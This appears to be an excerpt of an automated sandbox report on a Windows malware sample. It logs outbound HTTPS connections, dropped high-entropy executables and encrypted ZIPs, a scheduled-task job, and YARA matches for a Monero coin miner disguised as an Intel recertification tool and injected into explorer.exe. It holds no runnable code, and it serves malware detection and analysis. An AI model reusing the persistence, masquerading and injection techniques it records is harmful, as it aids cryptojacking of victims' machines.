                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49890 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49911 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49917 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49923 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49924 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49933 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.5:49930 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49942 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49953 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49963 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.5:49992 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.5:49998 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50151 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50157 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50161 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50163 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50164 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50167 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50169 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50170 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50178 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50180 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50205 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50216 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50217 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50220 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50223 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50225 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:50266 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,28_2_004050F9
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0009F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,44_2_0009F7C7
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0009F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,44_2_0009F55C
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,28_2_004044D1
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000B9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,44_2_000B9FD2

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Writes many files with high entropy
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe entropy: 7.99505709583Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe entropy: 7.99505709583Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeFile created: C:\Users\user\AppData\Local\Temp\main\file.bin entropy: 7.99994867689Jump to dropped file
                          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\main\file.zip (copy) entropy: 7.99994867689Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip entropy: 7.9992359396Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip entropy: 7.99771683584Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip entropy: 7.99772074518Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip entropy: 7.99772354314Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip entropy: 7.99772670895Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip entropy: 7.99772941561Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip entropy: 7.99773141174Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeFile created: C:\Users\user\AppData\Local\Temp\Judy entropy: 7.99748219008Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeFile created: C:\Users\user\AppData\Local\Temp\Sheets entropy: 7.9968933833Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeFile created: C:\Users\user\AppData\Local\Temp\Wanting entropy: 7.99557217292Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeFile created: C:\Users\user\AppData\Local\Temp\Another entropy: 7.99825978779Jump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\245347\b entropy: 7.99931676039Jump to dropped file

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 53.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 53.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 33.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 33.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 29.3.Intel_PTT_EK_Recertification.exe.20164cf0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 29.3.Intel_PTT_EK_Recertification.exe.20164cf0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 29.3.Intel_PTT_EK_Recertification.exe.20164cf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 29.3.Intel_PTT_EK_Recertification.exe.20164cf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                          Drops password protected ZIP file
                          Source: file.bin.6.drZip Entry: encrypted
                          PE file contains section with special chars
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: random[1].exe0.5.drStatic PE information: section name:
                          Source: random[1].exe0.5.drStatic PE information: section name: .idata
                          Source: random[1].exe0.5.drStatic PE information: section name:
                          Source: db77c3e215.exe.5.drStatic PE information: section name:
                          Source: db77c3e215.exe.5.drStatic PE information: section name: .idata
                          Source: db77c3e215.exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name: .idata
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: ea2827841c.exe.5.drStatic PE information: section name:
                          Source: ea2827841c.exe.5.drStatic PE information: section name: .idata
                          Source: ea2827841c.exe.5.drStatic PE information: section name:
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006696AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,10_2_006696AC
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00081B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,44_2_00081B4D
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,28_2_004038AF
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0008F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,44_2_0008F20D
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeFile created: C:\Windows\MpForgotten
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeFile created: C:\Windows\TabletAction
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeFile created: C:\Windows\CommunityProduction
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeFile created: C:\Windows\ExtractNicholas
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000970490_2_00097049
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000988600_2_00098860
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000978BB0_2_000978BB
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000931A80_2_000931A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00054B300_2_00054B30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00092D100_2_00092D10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00054DE00_2_00054DE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00087F360_2_00087F36
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0009779B0_2_0009779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FD78BB2_2_00FD78BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FD88602_2_00FD8860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FD70492_2_00FD7049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FD31A82_2_00FD31A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00F94B302_2_00F94B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00F94DE02_2_00F94DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FD2D102_2_00FD2D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FD779B2_2_00FD779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FC7F362_2_00FC7F36
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0068F13E10_2_0068F13E
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0068545810_2_00685458
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006824C010_2_006824C0
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006847AC10_2_006847AC
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006A881710_2_006A8817
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_00670DCC10_2_00670DCC
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0066B11410_2_0066B114
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0066F1B410_2_0066F1B4
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0067C27810_2_0067C278
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0069257810_2_00692578
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006A352810_2_006A3528
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0068D66C10_2_0068D66C
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0069066E10_2_0069066E
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0067D85810_2_0067D858
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0068694C10_2_0068694C
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006979DC10_2_006979DC
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006A49A510_2_006A49A5
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006999B810_2_006999B8
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006ADA3010_2_006ADA30
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0069FA0C10_2_0069FA0C
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_00677C6810_2_00677C68
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006ADC1110_2_006ADC11
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_00678CA810_2_00678CA8
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006ADD0010_2_006ADD00
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_00686E0810_2_00686E08
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0067AF5810_2_0067AF58
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_00668F1810_2_00668F18
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_0040737E28_2_0040737E
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_00406EFE28_2_00406EFE
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_004079A228_2_004079A2
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_004049A828_2_004049A8
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0004801744_2_00048017
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0003E14444_2_0003E144
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0002E1F044_2_0002E1F0
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0005A26E44_2_0005A26E
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000422A244_2_000422A2
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000222AD44_2_000222AD
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0003C62444_2_0003C624
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0005E87F44_2_0005E87F
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000AC8A444_2_000AC8A4
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00092A0544_2_00092A05
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00056ADE44_2_00056ADE
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00088BFF44_2_00088BFF
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0003CD7A44_2_0003CD7A
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0004CE1044_2_0004CE10
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0005715944_2_00057159
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0002924044_2_00029240
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000B531144_2_000B5311
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000296E044_2_000296E0
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0004170444_2_00041704
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00041A7644_2_00041A76
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00029B6044_2_00029B60
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00047B8B44_2_00047B8B
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00041D2044_2_00041D20
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00047DBA44_2_00047DBA
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00041FE744_2_00041FE7
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 000680C0 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00FA80C0 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: String function: 0003FD52 appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: String function: 00040DA0 appears 46 times
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: String function: 004062CF appears 58 times
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 53.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 53.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 33.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 33.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 29.3.Intel_PTT_EK_Recertification.exe.20164cf0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 29.3.Intel_PTT_EK_Recertification.exe.20164cf0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 29.3.Intel_PTT_EK_Recertification.exe.20164cf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 29.3.Intel_PTT_EK_Recertification.exe.20164cf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: random[2].exe1.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: adcf1df75f.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9982863589918256
                          Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9982863589918256
                          Source: random[1].exe0.5.drStatic PE information: Section: ZLIB complexity 0.9973445526541096
                          Source: random[1].exe0.5.drStatic PE information: Section: lzigcvvj ZLIB complexity 0.9945462015898131
                          Source: db77c3e215.exe.5.drStatic PE information: Section: ZLIB complexity 0.9973445526541096
                          Source: db77c3e215.exe.5.drStatic PE information: Section: lzigcvvj ZLIB complexity 0.9945462015898131
                          Source: random[1].exe1.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: random[1].exe1.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: 4fa7efe79d.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: 4fa7efe79d.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: random[2].exe.5.drStatic PE information: Section: bpttswmy ZLIB complexity 0.9947147135787525
                          Source: ea2827841c.exe.5.drStatic PE information: Section: bpttswmy ZLIB complexity 0.9947147135787525
